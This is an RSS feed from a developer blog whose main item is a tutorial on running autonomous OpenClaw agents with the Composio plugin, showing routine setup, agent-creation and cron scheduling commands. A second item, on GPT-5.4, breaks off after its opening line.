<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Shrijal Acharya</title>
    <description>The latest articles on Forem by Shrijal Acharya (@shricodev).</description>
    <link>https://forem.com/shricodev</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg</url>
      <title>Forem: Shrijal Acharya</title>
      <link>https://forem.com/shricodev</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/shricodev"/>
    <language>en</language>
    <item>
      <title>🚀 How to run a fully-autonomous company with OpenClaw 🦞</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Thu, 02 Apr 2026 14:39:22 +0000</pubDate>
      <link>https://forem.com/composiodev/how-to-run-a-fully-autonomous-company-with-openclaw-ma5</link>
      <guid>https://forem.com/composiodev/how-to-run-a-fully-autonomous-company-with-openclaw-ma5</guid>
      <description>&lt;p&gt;Imagine owning a company with just one human employee, and that too is yourself. The rest? All OpenClaw agents!&lt;/p&gt;

&lt;p&gt;Before OpenClaw, that would have sounded completely silly, but with it, it's possible, &lt;strong&gt;really possible!&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can automate your entire company or simulate a fully functioning one with just OpenClaw and your VPS, Mac Mini, or local system for testing.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fety6wnq6m91tsqhv27gi.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fety6wnq6m91tsqhv27gi.jpg" alt="obama meme" width="640" height="391"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;In this tutorial, you'll learn how to run an entire company using just yourself and a bunch of &lt;strong&gt;OpenClaw agents&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What you will learn: ✨&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What OpenClaw is and how it works&lt;/li&gt;
&lt;li&gt;Why storing API keys locally is a bad idea&lt;/li&gt;
&lt;li&gt;Setting up &lt;strong&gt;Composio&lt;/strong&gt; for secure OAuth-based integrations&lt;/li&gt;
&lt;li&gt;Connecting your first app and getting agents up and running 🚀&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Ready to become a one-person company? 👀&lt;/p&gt;




&lt;h2&gt;
  
  
  What's OpenClaw?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqljwq3cff8femj5e1s0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqljwq3cff8femj5e1s0.png" alt="OpenClaw Banner" width="800" height="259"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 I assume you already know what OpenClaw is. If not, why are you even here? Just kidding... The blog itself is completely beginner friendly. If you already have an idea of what OpenClaw is, just skip this section.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;OpenClaw is a personal AI assistant you run on your own machine or a server you own. It is the thing that actually sits between your model provider (OpenAI, Anthropic, Kimi, etc.) and the stuff you want done, such as messaging, tools, files, and integrations, and this idea is what actually makes the one-person company possible.&lt;/p&gt;

&lt;p&gt;Take this as a mental model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your LLM is the brain (thinks)&lt;/li&gt;
&lt;li&gt;OpenClaw is the body (it can do things)&lt;/li&gt;
&lt;li&gt;The Gateway is the receptionist (routes messages in and results out)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It provides the model with a runtime that can call tools, maintain state, and appear where you already chat (WhatsApp, Telegram, Slack, Discord, etc.). Now, that's just the gist. There's much more to understand. I assume you've already worked with it, so I'm not going any deeper than this in the intro.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosrayie6pppe2qbj6kan.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosrayie6pppe2qbj6kan.jpg" alt="OpenClaw architecture" width="800" height="516"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For installation, visit the OpenClaw &lt;a href="https://docs.openclaw.ai/install" rel="noopener noreferrer"&gt;installation guide&lt;/a&gt;, and based on your distro and installation choice, install it on your machine.&lt;/p&gt;

&lt;p&gt;If you just want it running quickly, do the normal installation. If you're even slightly paranoid (which you should be 😮‍💨), use Docker.&lt;/p&gt;

&lt;p&gt;Also, make sure you set up a channel for easier chatting from your phone (preferably Telegram).&lt;/p&gt;

&lt;p&gt;For help setting up a channel, ask OpenClaw itself. It knows itself better than anyone else on the internet.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 If you face issues like &lt;code&gt;OpenClaw: access not configured&lt;/code&gt; when talking with the bot, make sure you run this command:&lt;/p&gt;


&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw pairing approve &amp;lt;telegram/whatsapp/...&amp;gt; &amp;lt;pairing_code&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Just like that, now you have an agent listening on your channel. Message anything, and you should get a reply back.&lt;/p&gt;

&lt;p&gt;From here onwards, I assume you already have OpenClaw running. To make sure everything is working, run this command:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw health
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;If not, try running &lt;code&gt;openclaw doctor&lt;/code&gt;, which helps debug your gateway or channel issues.&lt;/p&gt;


&lt;h2&gt;
  
  
  Run a whole company?
&lt;/h2&gt;

&lt;p&gt;Yeah, in theory, you can actually automate or run an entire company. Can't guarantee the company will stand long, but with OpenClaw, it's now possible.&lt;/p&gt;

&lt;p&gt;The only human in the process is going to be yourself. All your employees will be &lt;strong&gt;OpenClaw Agents&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3j5c227mzou0xz0n0j38.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3j5c227mzou0xz0n0j38.png" alt="Openclaw running an entire company architecture" width="800" height="600"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, most day-to-day operations of running a company, such as sales, team meetings, and customer care, can be managed with OpenClaw Agents. And there are many more than just the ones in the image, of course. This is just a quick sketch to give you an idea.&lt;/p&gt;


&lt;h2&gt;
  
  
  Problem with "Just OpenClaw"
&lt;/h2&gt;

&lt;p&gt;By default, OpenClaw works with API keys, and it stores them in a plain text file in the &lt;code&gt;~/.openclaw/&lt;/code&gt; directory for all the services you use, such as Google, Gmail, and so on. This is not a very good practice if you're running this on your local machine. If using something like a VPS or the hyped &lt;strong&gt;Mac Mini&lt;/strong&gt;, it's fine, but still, storing credentials in a local plain text file is never a good idea.&lt;/p&gt;

&lt;p&gt;Especially if you're using smaller models, they are even more prone to prompt injections, and since OpenClaw has whole system access, it might wipe out your entire system without you doing anything.&lt;/p&gt;

&lt;p&gt;What's actually gone wrong in the wild (already):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Malicious skills on ClawHub:&lt;/strong&gt; researchers found hundreds to thousands of skills that were straight-up malware or had critical issues, including credential theft and prompt injection patterns.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Prompt injection turning into installs:&lt;/strong&gt; there's been at least one high-profile incident where a prompt injection was used to push OpenClaw onto machines via an agent workflow.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo215wy0xag7t8z86ogzv.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo215wy0xag7t8z86ogzv.jpg" alt="OpenClaw compromised" width="800" height="379"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For the above reasons, I recommend that you use some hosted service which in my case, &lt;strong&gt;Composio.&lt;/strong&gt; It lets you authenticate using OAuth, which is the most secure option over pasting keys locally.&lt;/p&gt;


&lt;h2&gt;
  
  
  Connecting your first app
&lt;/h2&gt;

&lt;p&gt;Now, it's time to create agents, but first, we need to set up or connect our first app from Composio.&lt;/p&gt;

&lt;p&gt;The agents will mostly revolve around working with those applications from Composio.&lt;/p&gt;
&lt;h3&gt;
  
  
  1. Install Composio Plugin
&lt;/h3&gt;

&lt;p&gt;Composio's OpenClaw plugin connects OpenClaw to Composio's MCP endpoint and exposes third-party tools (GitHub, Gmail, Slack, Notion, etc.) through that layer.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins &lt;span class="nb"&gt;install&lt;/span&gt; @composio/openclaw-plugin
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  2. Composio Plugin Setup
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Log in at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Choose OpenClaw as the client.&lt;/li&gt;
&lt;li&gt;Copy your consumer key (&lt;code&gt;ck_...&lt;/code&gt;) from the Composio dashboard settings, then set it:&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F982ctfxsvbsd8d1dsmmk.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F982ctfxsvbsd8d1dsmmk.jpg" alt="Composio OpenClaw setup instructions" width="800" height="213"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw config &lt;span class="nb"&gt;set &lt;/span&gt;plugins.entries.composio.config.consumerKey &lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Now, it's a good idea to restart the gateway:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw gateway restart
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  3. Verify the plugin loaded
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins list
openclaw logs &lt;span class="nt"&gt;--follow&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;You're looking for something like "Composio loaded" and a "tools registered" message.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fce73szhae07paumt96ae.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fce73szhae07paumt96ae.jpg" alt="OpenClaw successfully loads Composio" width="800" height="219"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If the plugin is &lt;strong&gt;"loaded"&lt;/strong&gt;, it means you can now successfully access Composio.&lt;/p&gt;

&lt;p&gt;Here's how it works:&lt;/p&gt;

&lt;p&gt;The plugin connects to Composio's MCP server at &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt; and registers all available tools directly into the OpenClaw agent. Tools are called by name — no extra search or execute steps needed.&lt;/p&gt;

&lt;p&gt;If a tool returns an auth error, the agent will prompt you to connect that toolkit at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Here's how the configuration looks:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"plugins"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"entries"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"composio"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"enabled"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"config"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"consumerKey"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;You can configure the following options directly from the config file:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;enabled&lt;/code&gt;: enable or disable the plugin&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;consumerKey&lt;/code&gt;: your Composio consumer key&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;mcpUrl&lt;/code&gt;: the MCP server URL. By default, it's &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Previously, you had to configure API keys per integration, but with Composio you don't have to worry about any of that. Just make sure &lt;strong&gt;not to leak&lt;/strong&gt; the consumer key that we generated.&lt;/p&gt;

&lt;p&gt;And it's that simple. Everything works out of the box just as you would use any other OpenClaw plugin!&lt;/p&gt;

&lt;p&gt;Now, to test if it works, head over to the Control UI chat and send a message, something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"List the Composio tools you have available."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryuiqg0zcs7udhjqn44a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryuiqg0zcs7udhjqn44a.png" alt="OpenClaw listing composio tools" width="800" height="358"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If it asks you to connect the tools, head over to &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt; and connect each of the tools you require. It's as simple as clicking &lt;strong&gt;Connect&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fecgu1xvvw1qzz27q5ymt.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fecgu1xvvw1qzz27q5ymt.jpg" alt="Adding integrations in Composio" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;All the integrations you use are OAuth-hosted, and only the tools you connect will be available to OpenClaw. Nothing more than that.&lt;/p&gt;


&lt;h2&gt;
  
  
  Setting up a Multi-Agent Team
&lt;/h2&gt;

&lt;p&gt;The idea is pretty clear. Since one single agent wouldn't be enough to handle all sorts of company requirements due to &lt;strong&gt;context window limitations&lt;/strong&gt;, you could have multiple sub-agents for multiple task types.&lt;/p&gt;

&lt;p&gt;Say, one agent AgentA handles marketing, AgentB handles business analysis, AgentC handles something else.&lt;/p&gt;

&lt;p&gt;Each agent has a distinct role, personality, and model optimized for its use case — say, for business analysis, you'd want a more research-oriented model like GPT-5.2.&lt;/p&gt;

&lt;p&gt;And how do you create them? It's simple, just chat with OpenClaw itself, either in the chat window or your configured channel.&lt;/p&gt;

&lt;p&gt;Example:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Please create a new agent called **Shri**. This agent should be capable of handling tasks such as reading and composing emails, and scheduling Google Meet sessions.

For the model, use **Claude Sonnet 4.6** (`claude-sonnet-4-6`).

Please ensure that the existing main agent remains untouched and unchanged.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd5r5jl6vv59m9a9tv8tb.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd5r5jl6vv59m9a9tv8tb.jpg" alt="Prompt in OpenClaw" width="800" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And it will create a new agent, which you can view in the &lt;code&gt;Agents&lt;/code&gt; tab in the OpenClaw dashboard or by running &lt;code&gt;/agents&lt;/code&gt; in the OpenClaw TUI.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvbr7ukxn72n1y7fyejgu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvbr7ukxn72n1y7fyejgu.png" alt="OpenClaw agents" width="800" height="417"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Similarly, do it for all your different work types. Create a separate agent for each type of work.&lt;/p&gt;

&lt;p&gt;The main agent can then delegate work to those specialized agents, each handling one specific task type, which improves response quality because one agent is handling one type of work instead of everything at once.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;TIP:&lt;/strong&gt; This also helps you reduce model usage costs, as you can assign more reasoning-heavy models to complex tasks and smaller, cheaper models to simpler ones.&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h2&gt;
  
  
  What's Missing?
&lt;/h2&gt;

&lt;p&gt;Everything seems good, but there's one thing missing... &lt;strong&gt;autonomy&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;You still have to message OpenClaw manually to get things done, which isn't ideal when you're planning on using it as an AI employee.&lt;/p&gt;

&lt;p&gt;There are two ways to achieve this:&lt;/p&gt;
&lt;h3&gt;
  
  
  1. If you're a little technical
&lt;/h3&gt;

&lt;p&gt;You must be familiar with cron jobs and their syntax. If so, this is a way to do it directly from the CLI outside of OpenClaw.&lt;/p&gt;

&lt;p&gt;Run the following command:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw cron add &lt;span class="nt"&gt;--schedule&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;cron_syntax&amp;gt;"&lt;/span&gt; &lt;span class="nt"&gt;--message&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;prompt&amp;gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Say you want it running every single day at 8 AM:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw cron add &lt;span class="nt"&gt;--schedule&lt;/span&gt; &lt;span class="s2"&gt;"0 9 * * *"&lt;/span&gt; &lt;span class="nt"&gt;--message&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;prompt&amp;gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  2. If you're not technical
&lt;/h3&gt;

&lt;p&gt;Similar to how we used a prompt to create a new agent, all you need to do is write a prompt:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Every morning at 9 AM, send me the top news of the day. Also scan my Google Calendar for the day, identify each attendee and their company. Send me two different messages on Telegram: one with the news summary and one with the meeting details.

Use the relevant Agent you have for each purpose.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;blockquote&gt;
&lt;p&gt;💁 There's also a similar concept called Heartbeat, which is another approach for scheduling tasks in OpenClaw. You can check it out here: &lt;a href="https://docs.openclaw.ai/gateway/heartbeat" rel="noopener noreferrer"&gt;OpenClaw Heartbeat&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h2&gt;
  
  
  Workflow Demo
&lt;/h2&gt;

&lt;p&gt;Okay, time for a demo.&lt;/p&gt;

&lt;p&gt;Showing an entire workflow demo of running a company would be too much work, so for this demo, I will show you one part of the workflow: checking the calendar and messaging a summary with attendees every day at a set time.&lt;/p&gt;

&lt;p&gt;You could have it run every X hours or every single day at a fixed time. After each interval, the model will do as said above (Obviously, the idea is too naive, but it's just for this demo.) The possibilities are endless.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Keep this in mind: “anything that you can do manually on the internet, you can automate with OpenClaw.” So, you get the idea.&lt;/p&gt;

&lt;p&gt;💁 &lt;strong&gt;NOTE:&lt;/strong&gt; If you're serious about this idea, it's better to run this on a VPS or a Mac Mini, because you mostly don't have your personal PC running 24/7.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/3WZ5PkqyCyc"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;


&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;So far, you've learned how to run a fully functioning company with just yourself and a bunch of &lt;strong&gt;OpenClaw agents&lt;/strong&gt;, using &lt;strong&gt;Composio&lt;/strong&gt; as the secure integration layer between OpenClaw and all your third-party apps.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Be sure to give a star to &lt;a href="https://github.com/ComposioHQ/composio" rel="noopener noreferrer"&gt;&lt;strong&gt;Composio&lt;/strong&gt;&lt;/a&gt; and &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;&lt;strong&gt;OpenClaw&lt;/strong&gt;&lt;/a&gt; on their GitHub repositories.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If you found this article helpful, drop a like and share your thoughts in the comments below. 👇&lt;/p&gt;

&lt;p&gt;Happy automating! 🥳&lt;/p&gt;


&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=150,height=150,fit=cover,gravity=auto,format=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;



</description>
      <category>ai</category>
      <category>productivity</category>
      <category>openclaw</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Everything you need to know about OpenAI GPT-5.4 ✌️</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Sat, 21 Mar 2026 14:08:05 +0000</pubDate>
      <link>https://forem.com/tensorlake/everything-you-need-to-know-about-openai-gpt-54-3lgm</link>
      <guid>https://forem.com/tensorlake/everything-you-need-to-know-about-openai-gpt-54-3lgm</guid>
      <description>&lt;p&gt;OpenAI’s new GPT-5.4 is here, and on paper at least, it looks like one of their strongest all-rounder models so far.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg2rrzzlrqx2wc2szp0do.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg2rrzzlrqx2wc2szp0do.png" alt="GPT 5.4 release blog"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

